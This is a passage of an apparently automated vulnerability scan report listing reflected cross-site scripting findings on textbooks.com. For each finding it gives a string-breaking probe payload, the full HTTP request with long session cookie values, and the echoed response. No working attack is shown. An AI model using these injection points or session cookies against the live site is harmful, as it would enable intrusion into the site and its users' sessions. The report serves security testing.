This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Author/ac74d'%3b4c3476296cf HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3623
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:52 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Author/ac74d';4c3476296cf'

</script>
...[SNIP]...

1.3. http://www.textbooks.com/BooksDescription.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /BooksDescription.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b6b9'%3b8382c7dc55e was submitted in the REST URL parameter 1. This input was echoed as 1b6b9';8382c7dc55e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BooksDescription.php1b6b9'%3b8382c7dc55e HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3636
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:06 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/BooksDescription.php1b6b9';8382c7dc55e'

</script>
...[SNIP]...

1.4. http://www.textbooks.com/BuyBack-Search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /BuyBack-Search.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 320c7'%3b68ef252aca3 was submitted in the REST URL parameter 1. This input was echoed as 320c7';68ef252aca3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BuyBack-Search.php320c7'%3b68ef252aca3 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3634
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:14 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...

   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/BuyBack-Search.php320c7';68ef252aca3'

</script>
...[SNIP]...

1.5. http://www.textbooks.com/Cart.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Cart.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46598'%3ba7b0f4f3bbd was submitted in the REST URL parameter 1. This input was echoed as 46598';a7b0f4f3bbd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Cart.php46598'%3ba7b0f4f3bbd HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3624
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:10 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
hReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Cart.php46598';a7b0f4f3bbd'

</script>
...[SNIP]...

1.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/A/Agriculture-and-Animal-Sciences.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31e9d'%3b4ecbefbb6df was submitted in the REST URL parameter 1. This input was echoed as 31e9d';4ecbefbb6df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog31e9d'%3b4ecbefbb6df/A/Agriculture-and-Animal-Sciences.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3661
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:52 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog31e9d';4ecbefbb6df/A/Agriculture-and-Animal-Sciences.php'

</script>
...[SNIP]...

1.7. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/A/Agriculture-and-Animal-Sciences.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6e79'%3b1bcf40fced7 was submitted in the REST URL parameter 3. This input was echoed as f6e79';1bcf40fced7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/A/f6e79'%3b1bcf40fced7 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:53 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/A/f6e79';1bcf40fced7'

</script>
...[SNIP]...

1.8. http://www.textbooks.com/Catalog/B/Business-and-Economics.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/B/Business-and-Economics.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7739'%3bbb127e79e67 was submitted in the REST URL parameter 1. This input was echoed as d7739';bb127e79e67 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalogd7739'%3bbb127e79e67/B/Business-and-Economics.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
